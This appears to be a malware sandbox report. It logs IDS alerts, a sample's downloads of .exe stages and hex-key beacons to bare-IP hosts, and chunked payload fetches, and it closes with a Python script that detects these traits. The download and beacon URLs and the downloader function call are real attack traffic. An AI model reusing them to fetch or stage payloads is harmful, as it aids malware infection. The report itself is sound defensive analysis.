Source: Network traffic, Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49731 -> 176.113.115.96:443
Source: Network traffic, Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49726 -> 176.113.115.96:443
Source: Network traffic, Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49720 -> 176.113.115.96:443
Source: Network traffic, Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49727 -> 176.113.115.96:443
Source: Network traffic, Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49730 -> 176.113.115.96:443
Source: Network traffic, Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49721 -> 176.113.115.96:443
Source: Network traffic, Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49725 -> 176.113.115.96:443
Source: Network traffic, Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49723 -> 176.113.115.96:443
Source: Network traffic, Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49735 -> 176.113.115.96:443
Source: Network traffic, Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49734 -> 176.113.115.96:443
            Source: global trafficHTTP traffic detected: GET /forsale/silk.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 91.240.118.49Connection: Keep-Alive
            Source: global traffic | HTTP traffic detected: GET /ai/?key=8f3f2b3ae14615677411efa3231678fbb38f926d19fe6595cd66946851e91fcd85241ab258d81329326be8e343a8f51f8a95b5cd212a91f953c588fb52d6db9f51a9a0a29d5954cad713479a672918d4348dd7d5915c4eca HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) | Host: 176.113.115.96
            Source: global traffic | HTTP traffic detected: GET /ai/?key=8f3f2b3ae14615677411efa3231678fbb38c926d19fe6595cd66946951e91fcd85250aef18d105672e26e5fd09b4a149c9c4e9976278d7f0449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d5905c4bce7535ffde HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) | Host: 176.113.115.96
            Source: global traffic | HTTP traffic detected: GET /ai/?key=8f3f2b3ae14615677411efa3231678fbb38d926d19fe6595cd66946951e91fcd85250aef18d105672e26e5fd09b4a149c9c4e9976278d7f0449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d5905c4bce7535ffde HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) | Host: 176.113.115.96
            Source: global traffic | HTTP traffic detected: GET /ai/?key=8f3f2b3ae14615677411efa3231678fbb38a926d19fe6595cd66946951e91fcd85250aef18d105672e26e5fd09b4a149c9c4e9976278d7f0449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d5905c4bce7535ffde HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) | Host: 176.113.115.96
            Source: global traffic | HTTP traffic detected: GET /ai/?key=8f3f2b3ae14615677411efa3231678fbb38b926d19fe6595cd66946951e91fcd85250aef18d105672e26e5fd09b4a149c9c4e9976278d7f0449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d5905c4bce7535ffde HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) | Host: 176.113.115.96
            Source: global traffic | HTTP traffic detected: GET /ai/?key=8f3f2b3ae14615677411efa3231678fbb388926d19fe6595cd66946951e91fcd85250aef18d105672e26e5fd09b4a149c9c4e9976278d7f0449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d5905c4bce7535ffde HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) | Host: 176.113.115.96
            Source: global traffic | HTTP traffic detected: GET /ai/?key=8f3f2b3ae14615677411efa3231678fbb389926d19fe6595cd66946951e91fcd85250aef18d105672e26e5fd09b4a149c9c4e9976278d7f0449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d5905c4bce7535ffde HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) | Host: 176.113.115.96
            Source: global traffic | HTTP traffic detected: GET /ai/?key=8f3f2b3ae14615677411efa3231678fbb386926d19fe6595cd66946951e91fcd85250aef18d105672e26e5fd09b4a149c9c4e9976278d7f0449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d5905c4bce7535ffde HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) | Host: 176.113.115.96
            Source: global traffic | HTTP traffic detected: GET /ai/?key=8f3f2b3ae14615677411efa3231678fbb387926d19fe6595cd66946951e91fcd85250aef18d105672e26e5fd09b4a149c9c4e9976278d7f0449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d5905c4bce7535ffde HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) | Host: 176.113.115.96
            Source: global traffic | HTTP traffic detected: GET /ai/?key=8f3f2b3ae14615677411efa3231678fbb38f842a1cec7a86d87bdb6546ad12dac0290dec1dd51729366be8eb43a8ec4cd78eec906920dff156d3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d3935949ca7731f8db05 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) | Host: 176.113.115.96
            Source: global traffic | HTTP traffic detected: GET /ai/?key=8f3f2b3ae14615677411efa3231678fbb38f852a1cec7a86d87bdb6546ad12dac0290dec1dd51729366be8eb43a8ec4cd78eec906920dff156d3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d3935949ca7731f8db05 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) | Host: 176.113.115.96
            Source: global traffic | HTTP traffic detected: GET /ai/?key=8f3f2b3ae14615677411efa3231678fbb38f862a1cec7a86d87bdb6546ad12dac0290dec1dd51729366be8eb43a8ec4cd78eec906920dff156d3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d3935949ca7731f8db05 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) | Host: 176.113.115.96
            Source: global traffic | HTTP traffic detected: GET /ai/?key=8f3f2b3ae14615677411efa3231678fbb38f872a1cec7a86d87bdb6546ad12dac0290dec1dd51729366be8eb43a8ec4cd78eec906920dff156d3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d3935949ca7731f8db05 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) | Host: 176.113.115.96
            Source: global traffic | HTTP traffic detected: GET /ai/?key=8f3f2b3ae14615677411efa3231678fbb38f802a1cec7a86d87bdb6546ad12dac0290dec1dd51729366be8eb43a8ec4cd78eec906920dff156d3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d3935949ca7731f8db05 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) | Host: 176.113.115.96
            Source: global traffic | HTTP traffic detected: GET /ai/?key=8f3f2b3ae14615677411efa3231678fbb38f812a1cec7a86d87bdb6546ad12dac0290dec1dd51729366be8eb43a8ec4cd78eec906920dff156d3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d3935949ca7731f8db05 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) | Host: 176.113.115.96
            Source: global traffic | HTTP traffic detected: GET /ai/?key=8f3f2b3ae14615677411efa3231678fbb38f822a1cec7a86d87bdb6546ad12dac0290dec1dd51729366be8eb43a8ec4cd78eec906920dff156d3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d3935949ca7731f8db05 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) | Host: 176.113.115.96
            Source: global traffic | HTTP traffic detected: GET /001.exe HTTP/1.1 | Accept: */* | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: 104.168.28.10 | Connection: Keep-Alive
            Source: global traffic | HTTP traffic detected: HEAD /data/001 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=0-0 | User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36 | Accept: */*
            Source: global traffic | HTTP traffic detected: GET /data/001 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=16384-32767 | User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36 | Accept: */*
            Source: global traffic | HTTP traffic detected: GET /data/001 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=65536-81919 | User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36 | Accept: */*
            Source: global traffic | HTTP traffic detected: GET /data/001 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=49152-65535 | User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36 | Accept: */*
            Source: global traffic | HTTP traffic detected: GET /data/001 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=81920-98303 | User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36 | Accept: */*
            Source: global traffic | HTTP traffic detected: GET /data/001 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=98304-114687 | User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36 | Accept: */*
            Source: global traffic | HTTP traffic detected: GET /data/001 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=114688-131071 | User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36 | Accept: */*
            Source: global traffic | HTTP traffic detected: GET /data/001 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=0-16383 | User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36 | Accept: */*
            Source: global traffic | HTTP traffic detected: GET /data/001 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=32768-49151 | User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36 | Accept: */*
            Source: global traffic | HTTP traffic detected: GET /data/001 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=131072-163839 | User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36 | Accept: */*
            Source: global traffic | HTTP traffic detected: GET /data/001 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=163840-196607 | User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36 | Accept: */*
            Source: global traffic | HTTP traffic detected: GET /data/001 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=196608-229375 | User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36 | Accept: */*
            Source: global traffic | HTTP traffic detected: GET /data/001 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=229376-262143 | User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36 | Accept: */*
            Source: global traffic | HTTP traffic detected: GET /data/001 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=262144-294911 | User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36 | Accept: */*
            Source: global traffic | HTTP traffic detected: GET /data/001 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=294912-327679 | User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36 | Accept: */*
            Source: global traffic | HTTP traffic detected: GET /data/001 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=327680-360447 | User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36 | Accept: */*
            Source: global traffic | HTTP traffic detected: GET /data/001 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=360448-393215 | User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36 | Accept: */*
            Source: global traffic | HTTP traffic detected: GET /data/001 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=393216-458751 | User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36 | Accept: */*
            Source: global traffic | HTTP traffic detected: GET /data/001 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=458752-524287 | User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36 | Accept: */*
            Source: global traffic | HTTP traffic detected: GET /data/001 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=524288-589823 | User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36 | Accept: */*
            Source: global traffic | HTTP traffic detected: GET /data/001 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=589824-655359 | User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36 | Accept: */*
            Source: global traffic | HTTP traffic detected: GET /data/001 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=655360-720895 | User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36 | Accept: */*
            Source: global traffic | HTTP traffic detected: GET /data/001 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=720896-786431 | User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36 | Accept: */*
            Source: global traffic | HTTP traffic detected: GET /data/001 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=786432-851967 | User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36 | Accept: */*
            Source: global traffic | HTTP traffic detected: GET /data/001 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=851968-917503 | User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36 | Accept: */*
            Source: global traffic | HTTP traffic detected: GET /data/001 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=1048576-1179647 | User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36 | Accept: */*
            Source: global traffic | HTTP traffic detected: GET /data/001 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=1179648-1310719 | User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36 | Accept: */*
            Source: global traffic | HTTP traffic detected: GET /data/001 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=1310720-1441791 | User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36 | Accept: */*
            Source: global traffic | HTTP traffic detected: GET /data/001 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=917504-1048575 | User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36 | Accept: */*
            Source: global traffic | HTTP traffic detected: GET /data/001 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=1441792-1572863 | User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36 | Accept: */*
            Source: global traffic | HTTP traffic detected: GET /data/001 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=1572864-1703935 | User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36 | Accept: */*
            Source: global traffic | HTTP traffic detected: GET /data/001 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=1703936-1835007 | User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36 | Accept: */*
            Source: global traffic | HTTP traffic detected: GET /data/001 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=1835008-1966079 | User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36 | Accept: */*
            Source: global traffic | HTTP traffic detected: GET /data/001 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=1966080-2228223 | User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36 | Accept: */*
            Source: global traffic | HTTP traffic detected: GET /data/001 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=2228224-2490367 | User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36 | Accept: */*
            Source: global traffic | HTTP traffic detected: GET /data/001 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=2752512-3014655 | User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36 | Accept: */*
            Source: global traffic | HTTP traffic detected: GET /data/001 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=2490368-2752511 | User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36 | Accept: */*
            Source: global traffic | HTTP traffic detected: GET /data/001 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=3014656-3276799 | User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36 | Accept: */*
            Source: global traffic | HTTP traffic detected: GET /data/001 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=3276800-3538943 | User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36 | Accept: */*
            Source: global traffic | HTTP traffic detected: GET /data/001 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=3538944-3801087 | User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36 | Accept: */*
            Source: global traffic | HTTP traffic detected: GET /data/001 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=3801088-4063231 | User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36 | Accept: */*
            Source: global traffic | HTTP traffic detected: GET /data/001 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=4063232-4587519 | User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36 | Accept: */*
            Source: global traffic | HTTP traffic detected: GET /data/001 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=4587520-5111807 | User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36 | Accept: */*
            Source: global traffic | HTTP traffic detected: GET /data/001 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=5111808-5636095 | User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36 | Accept: */*
            Source: global traffic | HTTP traffic detected: GET /data/001 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=5636096-6160383 | User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36 | Accept: */*
            Source: global traffic | HTTP traffic detected: GET /data/001 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=6160384-6684671 | User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36 | Accept: */*
            Source: global traffic | HTTP traffic detected: GET /data/001 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=6684672-6763823 | User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36 | Accept: */*
            Source: unknown | TCP traffic detected without corresponding DNS query: 104.168.28.10 (this line appears 50 times in the report, always for the same destination)
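The requests and DNS-less connections listed above share traits that are easy to turn into detection logic: every Host header is a bare IP literal, the /ai/?key= beacon carries a long hex blob and claims "Windows NT 9.0" (a version that never shipped), the stage is fetched as an .exe, /data/001 is pulled in many Range chunks, and 104.168.28.10 is contacted without any DNS lookup. The Python below is an added example, not part of the Joe Sandbox report: it parses request lines in the flattened one-line form used above (headers joined with " | "), flags those traits, and lists destinations that no DNS answer resolved to. The sample lines are constructed from the requests shown above; the www.example.com control line, its DNS answer, the 93.184.216.34 address and the chunk threshold are assumptions.

```python
"""Detection logic for the network indicators listed above.

Added example, not taken from the Joe Sandbox report: the sample lines are
constructed from the requests shown above, the www.example.com control and
its DNS answer are made up, and every threshold is an assumption.
"""
import ipaddress
import re

# Constructed sample log: one request per line, headers joined with " | "
# the way the report flattens each request into a single cell.
CHROME_UA = ("Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 "
             "(KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36")
SAMPLE_LOG = [
    "GET /forsale/silk.exe HTTP/1.1 | Accept: */* | UA-CPU: AMD64 | "
    "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0) | "
    "Host: 91.240.118.49 | Connection: Keep-Alive",
    "GET /ai/?key=8f3f2b3ae14615677411efa3231678fbb38f926d19fe6595cd66946851e91fcd"
    "85241ab258d81329326be8e343a8f51f8a95b5cd212a91f953c588fb52d6db9f51a9a0a29d5954"
    "cad713479a672918d4348dd7d5915c4eca HTTP/1.1 | "
    "User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) | Host: 176.113.115.96",
    f"HEAD /data/001 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=0-0 | User-Agent: {CHROME_UA} | Accept: */*",
    f"GET /data/001 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=0-16383 | User-Agent: {CHROME_UA} | Accept: */*",
    f"GET /data/001 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=16384-32767 | User-Agent: {CHROME_UA} | Accept: */*",
    f"GET /data/001 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=32768-49151 | User-Agent: {CHROME_UA} | Accept: */*",
    # Benign control (constructed): real hostname, real NT version, no payload.
    "GET /index.html HTTP/1.1 | Host: www.example.com | "
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 | Accept: */*",
]

# Windows NT versions that shipped; "Windows NT 9.0" in a UA is a giveaway.
KNOWN_NT_VERSIONS = {"5.0", "5.1", "5.2", "6.0", "6.1", "6.2", "6.3", "10.0"}
HEX_KEY = re.compile(r"^[0-9a-f]{64,}$")  # 64 hex chars is an assumed threshold


def parse_request(line):
    """Split one flattened request line into method, path and a header dict."""
    parts = [p.strip() for p in line.split(" | ")]
    method, path, _version = parts[0].split(" ", 2)
    headers = {}
    for part in parts[1:]:
        name, _, value = part.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers}


def is_bare_ip(host):
    """True when the Host header is an IP literal (IPv4 form, optional :port)."""
    try:
        ipaddress.ip_address(host.split(":")[0])
        return True
    except ValueError:
        return False


def request_flags(req):
    """Traits of a single request that match the traffic in this report."""
    flags = []
    headers = req["headers"]
    if is_bare_ip(headers.get("host", "")):
        flags.append("host_is_bare_ip")
    m = re.search(r"Windows NT (\d+\.\d+)", headers.get("user-agent", ""))
    if m and m.group(1) not in KNOWN_NT_VERSIONS:
        flags.append("bogus_windows_version")
    path, _, query = req["path"].partition("?")
    if path.lower().endswith(".exe"):
        flags.append("exe_download")
    for param in query.split("&"):
        name, _, value = param.partition("=")
        if name == "key" and HEX_KEY.match(value):
            flags.append("long_hex_key_beacon")
    return flags


def chunked_downloads(reqs, min_chunks=3):
    """(host, path) pairs fetched with at least min_chunks distinct GET byte ranges.
    The HEAD probe with bytes=0-0 is ignored; only GET chunks count."""
    ranges = {}
    for r in reqs:
        rng = r["headers"].get("range", "")
        if r["method"] == "GET" and rng.startswith("bytes="):
            ranges.setdefault((r["headers"].get("host"), r["path"]), set()).add(rng)
    return {key: len(v) for key, v in ranges.items() if len(v) >= min_chunks}


def analyze(lines):
    """Per-request flags in input order, plus the chunked-download summary."""
    reqs = [parse_request(line) for line in lines]
    return [(r["path"], request_flags(r)) for r in reqs], chunked_downloads(reqs)


def contacted_without_dns(tcp_destinations, dns_answers):
    """Destination IPs contacted although no DNS answer in the capture resolved to them."""
    resolved = {ip for answers in dns_answers.values() for ip in answers}
    return sorted(ip for ip in set(tcp_destinations) if ip not in resolved)


# Constructed: 104.168.28.10 contacted repeatedly with no lookup, as in the
# report; the example.com address and answer are made up for the control.
SAMPLE_TCP = ["104.168.28.10"] * 3 + ["93.184.216.34"]
SAMPLE_DNS = {"www.example.com": ["93.184.216.34"]}

if __name__ == "__main__":
    per_request, chunks = analyze(SAMPLE_LOG)
    for path, flags in per_request:
        print(f"{path[:40]:40} {', '.join(flags) or '-'}")
    print("chunked downloads:", chunks)
    print("contacted without DNS:", contacted_without_dns(SAMPLE_TCP, SAMPLE_DNS))
```

On the sample the two loader downloads are flagged as bare-IP .exe fetches, the /ai/ request as a bare-IP beacon with a bogus Windows version and a long hex key, /data/001 as a three-chunk ranged download, and 104.168.28.10 as the only destination with no DNS answer. Any single trait (a bare IP Host header in particular) is too noisy on its own; the value is in the combination, so score the flags together per host rather than alerting on each.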
            Source: C:\Users\user\Desktop\dxRwXy19pq.exe | Code function: 0_2_00402C60 CreateProcessA,CloseHandle,CloseHandle,CloseHandle,URLDownloadToFileA | 0_2_00402C60
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=1179648-1310719User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=1310720-1441791User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
